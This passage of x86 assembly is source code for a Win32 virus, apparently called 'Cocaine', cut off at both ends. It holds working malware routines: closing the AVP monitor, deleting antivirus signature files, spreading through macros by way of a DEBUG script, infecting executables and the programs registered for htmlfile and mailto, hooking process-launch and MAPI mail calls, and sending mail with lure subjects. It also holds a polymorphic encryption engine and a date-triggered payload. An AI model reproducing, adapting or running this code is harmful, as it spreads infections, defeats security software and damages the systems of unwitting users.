|
|||
|
call copy_line ;rcx
|
|||
|
add wo [ebp+(ofs addr-ofs vcode)], dx
|
|||
|
sub wo [ebp+(ofs addr-ofs vcode)], 100h
|
|||
|
lea esi, [ebp+(ofs ssize-ofs vcode)]
|
|||
|
call copy_line ;optimization!
|
|||
|
sub edi, 6
|
|||
|
call update_address ;set size
|
|||
|
mov eax, 000A0D00h+'"'
|
|||
|
stosd
|
|||
|
dec edi
|
|||
|
lea esi, [ebp+(ofs coda-ofs vcode)] ;copy final shit
|
|||
|
call copy_line
|
|||
|
ret
|
|||
|
script endp
|
|||
|
|
|||
|
dbgscript dd 0
|
|||
|
|
|||
|
dbgscript_size dd 0
|
|||
|
|
|||
|
intro db 'Open "C:\COCAINE.SRC" For OutPut As '
|
|||
|
dmt1 db '0', 13, 10
|
|||
|
dmt2 db 'Print #0, "N C:\W32COKE.EX"',13,10,0
|
|||
|
|
|||
|
outcmd db 'Print #0, "E ',0
|
|||
|
|
|||
|
ssize db 'Print #0, "RCX"', 13, 10, 0
|
|||
|
|
|||
|
coda db 'Print #0, "W"', 13, 10
|
|||
|
dmt3 db 'Print #0, "Q"', 13, 10
|
|||
|
dmt4 db 'Print #0, ""', 13, 10
|
|||
|
dmt5 db 'Close #0', 13, 10, 0
|
|||
|
|
|||
|
debugmutator proc
|
|||
|
pushad
|
|||
|
mov eax, 9
|
|||
|
call random
|
|||
|
inc eax
|
|||
|
add by [ebp+(ofs dmt1-ofs vcode)], al
|
|||
|
add by [ebp+(ofs dmt2-ofs vcode)+7], al
|
|||
|
add by [ebp+(ofs outcmd-ofs vcode)+7], al
|
|||
|
add by [ebp+(ofs ssize-ofs vcode)+7], al
|
|||
|
add by [ebp+(ofs coda-ofs vcode)+7], al
|
|||
|
add by [ebp+(ofs dmt3-ofs vcode)+7], al
|
|||
|
add by [ebp+(ofs dmt4-ofs vcode)+7], al
|
|||
|
add by [ebp+(ofs dmt5-ofs vcode)+7], al
|
|||
|
popad
|
|||
|
ret
|
|||
|
debugmutator endp
|
|||
|
|
|||
|
macro_end equ this byte
|
|||
|
|
|||
|
MakeVar proc
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
mov eax, 5
|
|||
|
call random
|
|||
|
add eax, 4
|
|||
|
mov ecx, eax
|
|||
|
@@1:
|
|||
|
mov al, 'Z'-'A'
|
|||
|
call random
|
|||
|
add al, 'A'
|
|||
|
call random_f
|
|||
|
jc @@2
|
|||
|
sub al, 'A'-'a'
|
|||
|
@@2:
|
|||
|
stosb
|
|||
|
push ecx
|
|||
|
push edi
|
|||
|
call @@3
|
|||
|
db 'AaEeIiOoUu'
|
|||
|
@@3:
|
|||
|
pop edi
|
|||
|
mov ecx, 10
|
|||
|
repne scasb
|
|||
|
jecxz @@4
|
|||
|
dec dwo [esp-1]
|
|||
|
@@4:
|
|||
|
pop edi
|
|||
|
pop ecx
|
|||
|
loop @@1
|
|||
|
stosb
|
|||
|
pop eax
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
MakeVar endp
|
|||
|
|
|||
|
PatchIT proc
|
|||
|
push esi
|
|||
|
lea edi, [esi+ecx] ;destination
|
|||
|
mov ecx, 4
|
|||
|
push eax
|
|||
|
mov esi, esp ;fake buffer in stack
|
|||
|
call WriteMem
|
|||
|
pop esi ;remove shit
|
|||
|
pop esi
|
|||
|
ret
|
|||
|
PatchIT endp
|
|||
|
|
|||
|
_base dd 400000h
|
|||
|
|
|||
|
NUM_TOPICS EQU 8
|
|||
|
|
|||
|
topics equ this byte
|
|||
|
dd ofs t0-ofs vcode
|
|||
|
dd ofs t0-ofs vcode
|
|||
|
dd ofs t0-ofs vcode
|
|||
|
dd ofs t1-ofs vcode
|
|||
|
dd ofs t2-ofs vcode
|
|||
|
dd ofs t3-ofs vcode
|
|||
|
dd ofs t4-ofs vcode
|
|||
|
dd ofs t5-ofs vcode
|
|||
|
|
|||
|
t0 db '', 0
|
|||
|
t1 db 'Kewl page!', 0
|
|||
|
t2 db 'Improvement to your page', 0
|
|||
|
t3 db 'Your page r0x0r!', 0
|
|||
|
t4 db 'You must see this...', 0
|
|||
|
t5 db 'Secret stuff!', 0
|
|||
|
|
|||
|
|
|||
|
;ESI=Code to encript (Big enought; Swappable)
|
|||
|
;EDI=Place to put code (Big enought; Swappable)
|
|||
|
;ECX=Size of code to encript
|
|||
|
;EAX=Delta entrypoint
|
|||
|
;EDX=VA where code will run in host
|
|||
|
;
|
|||
|
;EDI=Final buffer
|
|||
|
;ECX=Size
|
|||
|
;EAX=New delta entrypoint
|
|||
|
mutate proc
|
|||
|
cld
|
|||
|
push eax
|
|||
|
call crypt_poly ;decript engine
|
|||
|
mov [ebp+(ofs rva-ofs vcode)], edx
|
|||
|
call random0
|
|||
|
mov [ebp+(ofs cp_key-ofs vcode)], al ;next memory key
|
|||
|
mov eax, [ebp+(ofs seed-ofs vcode)]
|
|||
|
mov [ebp+(ofs pseed-ofs vcode)], eax
|
|||
|
mov eax, 3
|
|||
|
call random
|
|||
|
push 2
|
|||
|
pop ebx
|
|||
|
add ebx, eax
|
|||
|
or bl, 1
|
|||
|
pop eax
|
|||
|
@@1:
|
|||
|
push ebx
|
|||
|
call poly
|
|||
|
xchg esi, edi ;permute bufferz
|
|||
|
pop ebx
|
|||
|
dec ebx
|
|||
|
jnz @@1 ;next loop
|
|||
|
xchg esi, edi
|
|||
|
call crypt_poly ;encript poly engine after use
|
|||
|
ret
|
|||
|
mutate endp
|
|||
|
|
|||
|
crypt_poly proc
|
|||
|
pushad
|
|||
|
mov al, by [ebp+(ofs cp_key-ofs vcode)]
|
|||
|
mov ecx, ofs egtable-ofs poly
|
|||
|
lea esi, [ebp+(ofs poly-ofs vcode)]
|
|||
|
@@1:
|
|||
|
xor by [esi], al
|
|||
|
inc esi
|
|||
|
loop @@1
|
|||
|
popad
|
|||
|
ret
|
|||
|
crypt_poly endp
|
|||
|
|
|||
|
rbuf db MAX_BRANCH*(128+4+4) dup (0)
|
|||
|
|
|||
|
vinit proc
|
|||
|
mov esp, [esp+8]
|
|||
|
call delta
|
|||
|
lea eax, [ebp+(ofs seh-ofs vcode)]
|
|||
|
mov [esp-4], eax
|
|||
|
call init ;get api entries
|
|||
|
jc @@3
|
|||
|
sub eax, eax
|
|||
|
mov ecx, MAX_SOCK+1
|
|||
|
lea edi, [ebp+(ofs _socket-ofs vcode)]
|
|||
|
rep stosd
|
|||
|
mov [ebp+(ofs email_w-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs mdeep-ofs vcode)], al
|
|||
|
lea eax, [ebp+(ofs kernel-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
|
|||
|
mov [ebp+(ofs K32-ofs vcode)], eax ;save kernel32 base
|
|||
|
lea esi, [ebp+(ofs k32_names-ofs vcode)]
|
|||
|
lea edi, [ebp+(ofs k32_address-ofs vcode)]
|
|||
|
@@1:
|
|||
|
lodsd
|
|||
|
or eax, eax
|
|||
|
jz @@2
|
|||
|
add eax, ebp
|
|||
|
call gpa_kernel32 ;get all api we want from k32
|
|||
|
jc @@3
|
|||
|
stosd
|
|||
|
jmp @@1
|
|||
|
db 0b9h
|
|||
|
@@2:
|
|||
|
lea eax, [ebp+(ofs user-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _LoadLibraryA-ofs vcode)]
|
|||
|
mov [ebp+(ofs U32-ofs vcode)], eax ;save user base
|
|||
|
@@4:
|
|||
|
lodsd
|
|||
|
or eax, eax
|
|||
|
jz @@5
|
|||
|
mov ebx, [ebp+(ofs U32-ofs vcode)]
|
|||
|
add eax, ebp
|
|||
|
call gpa_custom ;get all api we want again
|
|||
|
jc @@3
|
|||
|
stosd
|
|||
|
jmp @@4
|
|||
|
db 0eah
|
|||
|
@@5:
|
|||
|
|
|||
|
call @@adf
|
|||
|
db 'ADVAPI32',0
|
|||
|
@@adf:
|
|||
|
call [ebp+(ofs _LoadLibraryA-ofs vcode)]
|
|||
|
call @@a11
|
|||
|
db 'RegSetValueExA', 0
|
|||
|
@@a11:
|
|||
|
push eax
|
|||
|
call @@aaa
|
|||
|
db 'RegCreateKeyExA', 0
|
|||
|
@@aaa:
|
|||
|
push eax
|
|||
|
call @@baa
|
|||
|
db 'RegOpenKeyExA', 0
|
|||
|
@@baa:
|
|||
|
push eax
|
|||
|
call @@caa
|
|||
|
db 'RegQueryValueExA', 0
|
|||
|
@@caa:
|
|||
|
push eax
|
|||
|
call @@d
|
|||
|
db 'RegCloseKey', 0
|
|||
|
@@d:
|
|||
|
push eax ;retrieve all needed APIs
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
mov [ebp+(ofs _RegCloseKey-ofs vcode)], eax
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
mov [ebp+(ofs _RegQueryValueEx-ofs vcode)], eax
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
mov [ebp+(ofs _RegOpenKeyEx-ofs vcode)], eax
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
mov [ebp+(ofs _RegCreateKeyEx-ofs vcode)], eax
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
mov [ebp+(ofs _RegSetValueEx-ofs vcode)], eax
|
|||
|
|
|||
|
lea eax, [ebp+(ofs wavp-ofs vcode)]
|
|||
|
sub ecx, ecx
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
call [ebp+(ofs _FindWindowA-ofs vcode)]
|
|||
|
or eax,eax
|
|||
|
jz @@b
|
|||
|
push ecx ;terminate AVPM using vg scheme
|
|||
|
push ecx
|
|||
|
push 16
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _PostMessageA-ofs vcode)]
|
|||
|
@@b:
|
|||
|
|
|||
|
lea eax, [ebp+(ofs shitfile-ofs vcode)]
|
|||
|
push eax
|
|||
|
call DeleteShitFile
|
|||
|
|
|||
|
call @@a1
|
|||
|
db 'KERNEL.AVC', 0
|
|||
|
@@a1:
|
|||
|
call DeleteShitFile
|
|||
|
call @@a2
|
|||
|
db 'SIGN.DEF', 0
|
|||
|
@@a2:
|
|||
|
call DeleteShitFile
|
|||
|
call @@a3
|
|||
|
db 'FIND.DRV', 0
|
|||
|
@@a3:
|
|||
|
call DeleteShitFile
|
|||
|
call @@a4
|
|||
|
db 'NOD32.000', 0
|
|||
|
@@a4:
|
|||
|
call DeleteShitFile
|
|||
|
call @@a5
|
|||
|
db 'DSAVIO32.DLL', 0
|
|||
|
@@a5:
|
|||
|
call DeleteShitFile
|
|||
|
call @@a6
|
|||
|
db 'SCAN.DAT', 0
|
|||
|
@@a6:
|
|||
|
call DeleteShitFile
|
|||
|
call @@a7
|
|||
|
db 'VIRSCAN.DAT', 0
|
|||
|
@@a7:
|
|||
|
call DeleteShitFile
|
|||
|
|
|||
|
call @@a8
|
|||
|
db 'C:\COCAINE.SRC', 0
|
|||
|
@@a8:
|
|||
|
call DeleteShitFile
|
|||
|
|
|||
|
lea ebx, [ebp+(ofs ancevsys-ofs vcode)]
|
|||
|
push 83h
|
|||
|
push ebx
|
|||
|
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
|
|||
|
|
|||
|
lea esi, [ebp+(ofs current_time-ofs vcode)]
|
|||
|
push esi
|
|||
|
call [ebp+(ofs _GetSystemTime-ofs vcode)]
|
|||
|
lea edi, [ebp+(ofs seed-ofs vcode)]
|
|||
|
sub eax, eax
|
|||
|
lodsw
|
|||
|
lodsw ;init seed with dayofweek/day
|
|||
|
movsd
|
|||
|
push eax
|
|||
|
sub al, MONTH_DELAY ;enougth time passed?
|
|||
|
jnc @@6
|
|||
|
add al, 12
|
|||
|
@@6:
|
|||
|
cmp by [ebp+(ofs FunDate-ofs vcode)], al
|
|||
|
mov al, 90h
|
|||
|
je @@7
|
|||
|
add al, 0c3h-90h ;nop/ret flip
|
|||
|
@@7:
|
|||
|
mov by [ebp+(ofs Payload-ofs vcode)], al
|
|||
|
pop eax
|
|||
|
add al, MONTH_DELAY
|
|||
|
aam 12 ;set trigger date
|
|||
|
mov by [ebp+(ofs FunDate-ofs vcode)], al
|
|||
|
|
|||
|
call random0
|
|||
|
mov [ebp+(ofs key1-ofs vcode)], eax
|
|||
|
call random0
|
|||
|
mov [ebp+(ofs key2-ofs vcode)], eax
|
|||
|
|
|||
|
call macro_crypt ;decript macro stuff
|
|||
|
|
|||
|
call MacroSpread
|
|||
|
|
|||
|
call random0
|
|||
|
add by [ebp+(ofs macro_key-ofs vcode)], al
|
|||
|
call macro_crypt ;encript macro stuff
|
|||
|
|
|||
|
lea edx, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push edx
|
|||
|
push MAX_PATH
|
|||
|
call [ebp+(ofs _GetCurrentDirectoryA-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@10
|
|||
|
call ProcessDir
|
|||
|
@@10:
|
|||
|
IF DIRECT EQ TRUE
|
|||
|
lea edx, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push MAX_PATH
|
|||
|
push edx
|
|||
|
call [ebp+(ofs _GetWindowsDirectoryA-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@11
|
|||
|
call ProcessDir
|
|||
|
@@11:
|
|||
|
; lea edx, [ebp+(ofs directory-ofs vcode)]
|
|||
|
; push MAX_PATH
|
|||
|
; push edx
|
|||
|
; call [ebp+(ofs _GetSystemDirectoryA-ofs vcode)]
|
|||
|
; test eax, eax
|
|||
|
; jz @@12
|
|||
|
; call ProcessDir
|
|||
|
; @@12:
|
|||
|
ENDIF
|
|||
|
mov esi, [ebp+(ofs _base-ofs vcode)]
|
|||
|
@@a:
|
|||
|
lea eax, [ebp+(ofs NewWinExec-ofs vcode)]
|
|||
|
mov ecx, 0 ;hook per-process functionz
|
|||
|
OldWinExec equ dwo $-4
|
|||
|
jecxz @@8
|
|||
|
call PatchIT
|
|||
|
@@8:
|
|||
|
lea eax, [ebp+(ofs NewCreateProcessA-ofs vcode)]
|
|||
|
mov ecx, 0
|
|||
|
OldCreateProcessA equ dwo $-4
|
|||
|
jecxz @@9
|
|||
|
call PatchIT
|
|||
|
@@9:
|
|||
|
lea eax, [ebp+(ofs NewMAPISendMail-ofs vcode)]
|
|||
|
mov ecx, 0
|
|||
|
OldMAPISendMail equ dwo $-4
|
|||
|
jecxz @@92
|
|||
|
call PatchIT
|
|||
|
@@92:
|
|||
|
lea eax, [ebp+(ofs NewGetProcAddress-ofs vcode)]
|
|||
|
mov ecx, 0
|
|||
|
OldGetProcAddress equ dwo $-4
|
|||
|
jecxz @@93
|
|||
|
call PatchIT
|
|||
|
@@93:
|
|||
|
|
|||
|
call Payload
|
|||
|
@@3:
|
|||
|
call delta
|
|||
|
cmp by [ebp+(ofs RestoreChunkz-ofs vcode)], FALSE
|
|||
|
je @@aa
|
|||
|
|
|||
|
mov edx, MAX_BRANCH
|
|||
|
lea esi, [ebp+(ofs rbuf-ofs vcode)]
|
|||
|
@@rc1:
|
|||
|
lodsd
|
|||
|
add eax, [ebp+(ofs _base-ofs vcode)]
|
|||
|
mov edi, eax
|
|||
|
lodsd
|
|||
|
mov ecx, eax
|
|||
|
pushad
|
|||
|
call WriteMem
|
|||
|
popad
|
|||
|
lea esi, [esi+ecx]
|
|||
|
dec edx
|
|||
|
jnz @@rc1
|
|||
|
|
|||
|
@@aa:
|
|||
|
mov eax, 365
|
|||
|
call random
|
|||
|
cmp ax, 24
|
|||
|
jne @sajsj
|
|||
|
call GetList
|
|||
|
lea eax, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push eax
|
|||
|
call DeleteShitFile
|
|||
|
@sajsj:
|
|||
|
|
|||
|
call OpenAncev
|
|||
|
jc @@jdjd
|
|||
|
lea eax, [ebp+(ofs cokefile-ofs vcode)]
|
|||
|
push eax
|
|||
|
call DeleteShitFile
|
|||
|
@@jdjd:
|
|||
|
|
|||
|
mov eax, NUM_TOPICS
|
|||
|
call random
|
|||
|
mov eax, [ebp+(ofs topics-ofs vcode)+(eax*4)]
|
|||
|
add eax, ebp
|
|||
|
mov [ebp+(ofs subject-ofs vcode)], eax
|
|||
|
|
|||
|
IF DIRECT EQ TRUE
|
|||
|
inc dwo [ebp+(ofs what_key-ofs vcode)]
|
|||
|
call @@2323
|
|||
|
db 'SOFTWARE\Classes\htmlfile\shell\open\command', 0
|
|||
|
@@2323:
|
|||
|
pop eax
|
|||
|
call ConsultKey
|
|||
|
call FixKey
|
|||
|
sub eax, eax
|
|||
|
mov dwo [ebp+(ofs fsizel-ofs vcode)], eax
|
|||
|
mov dwo [ebp+(ofs mm_on_off-ofs vcode)], eax
|
|||
|
call Infect
|
|||
|
|
|||
|
call @@2324
|
|||
|
db 'SOFTWARE\Classes\mailto\shell\open\command', 0
|
|||
|
@@2324:
|
|||
|
pop eax
|
|||
|
call ConsultKey
|
|||
|
call FixKey
|
|||
|
sub eax, eax
|
|||
|
mov dwo [ebp+(ofs fsizel-ofs vcode)], eax
|
|||
|
call Infect
|
|||
|
dec dwo [ebp+(ofs what_key-ofs vcode)]
|
|||
|
ENDIF
|
|||
|
|
|||
|
sub eax, eax
|
|||
|
lea esi, [ebp+(ofs thread-ofs vcode)]
|
|||
|
push esi
|
|||
|
push eax
|
|||
|
push ebp
|
|||
|
lea esi, [ebp+(ofs MailThread-ofs vcode)]
|
|||
|
push esi
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _CreateThread-ofs vcode)]
|
|||
|
call http_install
|
|||
|
ret2host:
|
|||
|
pop dwo fs:[0] ;restore seh frame
|
|||
|
pop eax
|
|||
|
jmp host ;jmp to host
|
|||
|
vinit endp
|
|||
|
|
|||
|
host_entry equ dwo $-4
|
|||
|
|
|||
|
seh:
|
|||
|
mov esp, [esp+8]
|
|||
|
jmp ret2host
|
|||
|
|
|||
|
FixKey proc
|
|||
|
push -2
|
|||
|
pop ecx
|
|||
|
mov edi, esi
|
|||
|
@@0:
|
|||
|
lodsb
|
|||
|
cmp al, '"'
|
|||
|
je @@1
|
|||
|
test al, al
|
|||
|
jz @@2
|
|||
|
cmp al, ' '
|
|||
|
jne @@3
|
|||
|
cmp ecx, -2
|
|||
|
je @@2
|
|||
|
@@3:
|
|||
|
stosb
|
|||
|
jmp @@0
|
|||
|
@@1:
|
|||
|
inc ecx
|
|||
|
jecxz @@2
|
|||
|
jmp @@0
|
|||
|
@@2:
|
|||
|
sub eax, eax
|
|||
|
stosb
|
|||
|
ret
|
|||
|
FixKey endp
|
|||
|
|
|||
|
cokefile db 'C:\COCAINE.SYS', 0
|
|||
|
|
|||
|
init proc
|
|||
|
mov ecx, esp
|
|||
|
call @@3
|
|||
|
mov esp, [esp+8] ;fix stack
|
|||
|
@@1:
|
|||
|
call delta
|
|||
|
stc ;signal error
|
|||
|
mov cl, ?
|
|||
|
org $-1
|
|||
|
@@2:
|
|||
|
clc ;signal sucess
|
|||
|
pop dwo fs:[0] ;restore seh frame
|
|||
|
sahf
|
|||
|
add esp, 4
|
|||
|
lahf
|
|||
|
ret
|
|||
|
db 081h
|
|||
|
@@3:
|
|||
|
sub eax, eax
|
|||
|
push dwo fs:[eax]
|
|||
|
mov fs:[eax], esp ;set new seh frame
|
|||
|
mov eax, 0 ;is GetModuleHandleA imported?
|
|||
|
OldGetModuleHandleA equ dwo $-4
|
|||
|
test eax, eax
|
|||
|
jz @@5
|
|||
|
add eax, [ebp+(ofs _base-ofs vcode)]
|
|||
|
lea edx, [ebp+(ofs kernel-ofs vcode)]
|
|||
|
push edx
|
|||
|
call [eax] ;use imported API to get
|
|||
|
test eax, eax ;kernel32 module
|
|||
|
jz @@5
|
|||
|
mov edx, eax
|
|||
|
jmp @@4
|
|||
|
@@5:
|
|||
|
mov eax, 077f00000h ;wNT base
|
|||
|
push eax
|
|||
|
call check_base
|
|||
|
pop edx
|
|||
|
jz @@4
|
|||
|
mov eax, 077e00000h ;wNT 5 base
|
|||
|
push eax
|
|||
|
call check_base
|
|||
|
pop edx
|
|||
|
jz @@4
|
|||
|
mov eax, 0bff70000h ;w9x base
|
|||
|
push eax
|
|||
|
call check_base
|
|||
|
pop edx
|
|||
|
jnz @@1
|
|||
|
@@4:
|
|||
|
mov eax, edx
|
|||
|
mov ebx, eax
|
|||
|
call delta
|
|||
|
add eax, [eax+3ch]
|
|||
|
cmp dwo [eax], 'EP'
|
|||
|
jne @@1
|
|||
|
add ebx, [eax+120] ;export table
|
|||
|
lea eax, [ebp+(ofs sGetModuleHandle-ofs vcode)]
|
|||
|
mov dwo [ebp+(ofs size_search-ofs vcode)], 17
|
|||
|
mov [ebp+(ofs string_search-ofs vcode)], eax
|
|||
|
call search_et ;get GetModuleHandle
|
|||
|
jc @@1
|
|||
|
mov [ebp+(ofs _GetModuleHandle-ofs vcode)], eax
|
|||
|
lea eax, [ebp+(ofs sGetProcAddress-ofs vcode)]
|
|||
|
mov dwo [ebp+(ofs size_search-ofs vcode)], 15
|
|||
|
mov [ebp+(ofs string_search-ofs vcode)], eax
|
|||
|
call search_et ;get GetProcAddress
|
|||
|
jc @@1
|
|||
|
mov [ebp+(ofs _GetProcAddress-ofs vcode)], eax
|
|||
|
jmp @@2
|
|||
|
init endp
|
|||
|
|
|||
|
check_base proc
|
|||
|
call @@1
|
|||
|
mov esp, [esp+8]
|
|||
|
call delta
|
|||
|
cmp eax, esp
|
|||
|
jmp @@0
|
|||
|
@@1:
|
|||
|
push dwo fs:[0]
|
|||
|
mov fs:[0], esp
|
|||
|
cmp wo [eax], 'ZM'
|
|||
|
@@0:
|
|||
|
pop dwo fs:[0]
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
check_base endp
|
|||
|
|
|||
|
search_et proc
|
|||
|
mov eax, [ebx+32]
|
|||
|
add eax, edx ;name table ptr
|
|||
|
@@1:
|
|||
|
mov esi, [eax]
|
|||
|
or esi, esi
|
|||
|
jz @@3 ;nul ptr
|
|||
|
add esi, edx
|
|||
|
mov edi, 0
|
|||
|
string_search equ dwo $-4
|
|||
|
mov ecx, 0
|
|||
|
size_search equ dwo $-4
|
|||
|
rep cmpsb ;the one we search?
|
|||
|
jz @@2
|
|||
|
add eax, 4
|
|||
|
jmp @@1 ;check next api
|
|||
|
@@2:
|
|||
|
sub eax, [ebx+32]
|
|||
|
sub eax, edx
|
|||
|
shr eax, 1 ;div by 2
|
|||
|
add eax, [ebx+36]
|
|||
|
add eax, edx
|
|||
|
movzx eax, wo [eax]
|
|||
|
shl eax, 2 ;mul by 4
|
|||
|
add eax, [ebx+28]
|
|||
|
add eax, edx
|
|||
|
mov eax, [eax]
|
|||
|
add eax, edx
|
|||
|
clc ;signal sucess
|
|||
|
mov cl, 12h
|
|||
|
org $-1
|
|||
|
@@3:
|
|||
|
stc ;signal error
|
|||
|
ret
|
|||
|
search_et endp
|
|||
|
|
|||
|
gpa_custom proc
|
|||
|
push eax ;pointer to api wanted
|
|||
|
push ebx ;module handle
|
|||
|
jmp _gpa
|
|||
|
db 66h
|
|||
|
|
|||
|
gpa_kernel32 proc
|
|||
|
push eax
|
|||
|
push dwo [ebp+(ofs K32-ofs vcode)]
|
|||
|
_gpa:
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
or eax, eax
|
|||
|
jz @@1
|
|||
|
clc
|
|||
|
mov cl, 12h
|
|||
|
org $-1
|
|||
|
@@1:
|
|||
|
stc
|
|||
|
ret
|
|||
|
gpa_kernel32 endp
|
|||
|
gpa_custom endp
|
|||
|
|
|||
|
MAX_RECURSION = 3
|
|||
|
JMP_MAX = 16
|
|||
|
MAX_SUBROUTINES = 16
|
|||
|
|
|||
|
flg record{
|
|||
|
_key:1, ;1key isnt necessary ;4
|
|||
|
_encriptor:2 ;XOR = 00
|
|||
|
;NOT = 01
|
|||
|
;ADD = 10
|
|||
|
;SUB = 11 ;23
|
|||
|
_bwd_fwd:1, ;0inc/1dec counter ;1
|
|||
|
_direction:1, ;1backward/0forward ;0
|
|||
|
}
|
|||
|
|
|||
|
pushf
|
|||
|
db 09ah
|
|||
|
|
|||
|
poly proc ;encripted in memory!
|
|||
|
push esi
|
|||
|
mov [ebp+(ofs entry-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs buffer-ofs vcode)], edi
|
|||
|
mov [ebp+(ofs _size-ofs vcode)], ecx ;save entry values
|
|||
|
sub eax, eax
|
|||
|
mov [ebp+(ofs reg32-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs recurse-ofs vcode)], eax ;init internal vars
|
|||
|
mov [ebp+(ofs lparm-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs lvars-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs subs_index-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs s_into-ofs vcode)], eax ;(dword)
|
|||
|
call random0
|
|||
|
and eax, mask _bwd_fwd + mask _direction + mask _encriptor
|
|||
|
mov [ebp+(ofs flagz-ofs vcode)], eax ;set engine flagz
|
|||
|
mov edx, eax
|
|||
|
and edx, 11b
|
|||
|
call random0
|
|||
|
mov [ebp+(ofs key-ofs vcode)], al ;choose key
|
|||
|
lea ebx, [ebp+(ofs crypt_table-ofs vcode)]
|
|||
|
test edx, 10b
|
|||
|
jz @@0
|
|||
|
add ebx, 6 ;next table
|
|||
|
@@0:
|
|||
|
test edx, 01b
|
|||
|
jz @@1
|
|||
|
add ebx, 3 ;second choice
|
|||
|
@@1:
|
|||
|
mov ax, wo [ebx]
|
|||
|
mov [ebp+(ofs _dec-ofs vcode)], ax
|
|||
|
mov al, by [ebx+2]
|
|||
|
mov [ebp+(ofs _enc-ofs vcode)], al
|
|||
|
dec edx
|
|||
|
jnz @@2
|
|||
|
mov by [ebp+(ofs key-ofs vcode)], 0D0h ;not dont use key
|
|||
|
bts dwo [ebp+(ofs flagz-ofs vcode)], 6 ;(mask _key)
|
|||
|
@@2:
|
|||
|
jmp @@3 ;flush piq
|
|||
|
@@3:
|
|||
|
lodsb
|
|||
|
_enc db 00
|
|||
|
key db 00
|
|||
|
stosb
|
|||
|
loop @@3 ;crypt code
|
|||
|
mov eax, 64
|
|||
|
call random
|
|||
|
mov ecx, eax
|
|||
|
call _shit
|
|||
|
mov [ebp+(ofs decriptor-ofs vcode)], edi;here the decriptor start
|
|||
|
call garble ;start of decriptor
|
|||
|
lea ebx, [ebp+(ofs make_counter-ofs vcode)]
|
|||
|
lea edx, [ebp+(ofs make_pointer-ofs vcode)]
|
|||
|
call swapper ;setup start of poly decriptor
|
|||
|
push edi ;loop start here
|
|||
|
call garble
|
|||
|
mov eax, [ebp+(ofs _dec-ofs vcode)]
|
|||
|
mov edx, [ebp+(ofs p_reg-ofs vcode)]
|
|||
|
or ah, dl
|
|||
|
stosw ;store crypt instr
|
|||
|
bt dwo [ebp+(ofs flagz-ofs vcode)], 6 ;(mask _key)
|
|||
|
jc @@4
|
|||
|
mov al, by [ebp+(ofs key-ofs vcode)]
|
|||
|
stosb ;store key
|
|||
|
@@4:
|
|||
|
call garble
|
|||
|
lea ebx, [ebp+(ofs upd_counter-ofs vcode)]
|
|||
|
lea edx, [ebp+(ofs upd_pointer-ofs vcode)]
|
|||
|
call swapper ;update counter and pointer
|
|||
|
mov edx, [ebp+(ofs c_reg-ofs vcode)]
|
|||
|
call random
|
|||
|
jc @@5
|
|||
|
call random
|
|||
|
js @@7
|
|||
|
mov eax, 0c00bh ;or reg, reg
|
|||
|
jmp @@8
|
|||
|
@@7:
|
|||
|
mov eax, 0c085h ;test reg, reg
|
|||
|
@@8:
|
|||
|
mov ecx, edx
|
|||
|
shl edx, 3
|
|||
|
or ah, dl
|
|||
|
or ah, cl
|
|||
|
stosw
|
|||
|
jmp @@6
|
|||
|
@@5:
|
|||
|
mov eax, 0f883h
|
|||
|
or ah, dl
|
|||
|
stosw ;cmp reg, 0
|
|||
|
sub eax, eax
|
|||
|
stosb
|
|||
|
@@6:
|
|||
|
mov ax, 850fh ;do conditional jump
|
|||
|
stosw
|
|||
|
pop edx
|
|||
|
sub edx, edi ;delta distance
|
|||
|
sub edx, 4
|
|||
|
mov eax, edx
|
|||
|
stosd ;jnz start_of_loop
|
|||
|
mov dwo [ebp+(ofs reg32-ofs vcode)], 0
|
|||
|
call garble
|
|||
|
mov al, 0e9h
|
|||
|
stosb ;jmp start
|
|||
|
mov eax, edi
|
|||
|
sub eax, [ebp+(ofs buffer-ofs vcode)]
|
|||
|
sub eax, [ebp+(ofs entry-ofs vcode)]
|
|||
|
add eax, 4
|
|||
|
neg eax
|
|||
|
stosd
|
|||
|
call garble
|
|||
|
call garble
|
|||
|
mov ecx, [ebp+(ofs buffer-ofs vcode)] ;(this allow the calls be
|
|||
|
sub edi, ecx ;forward/backward direction)
|
|||
|
xchg edi, ecx
|
|||
|
mov eax, [ebp+(ofs decriptor-ofs vcode)];calculate new entrypoint
|
|||
|
sub eax, [ebp+(ofs buffer-ofs vcode)] ;relative to previous rva
|
|||
|
pop esi
|
|||
|
ret
|
|||
|
poly endp
|
|||
|
|
|||
|
gar proc
|
|||
|
call random0 ;get any reg
|
|||
|
and eax, 0111b
|
|||
|
cmp al, 4 ;esp never
|
|||
|
je gar
|
|||
|
ret
|
|||
|
gar endp
|
|||
|
|
|||
|
get8free proc
|
|||
|
mov eax, [ebp+(ofs reg32-ofs vcode)]
|
|||
|
and eax, 01111b
|
|||
|
cmp eax, 01111b
|
|||
|
jne @@1
|
|||
|
stc
|
|||
|
ret
|
|||
|
@@1:
|
|||
|
call random0
|
|||
|
and eax, 011b
|
|||
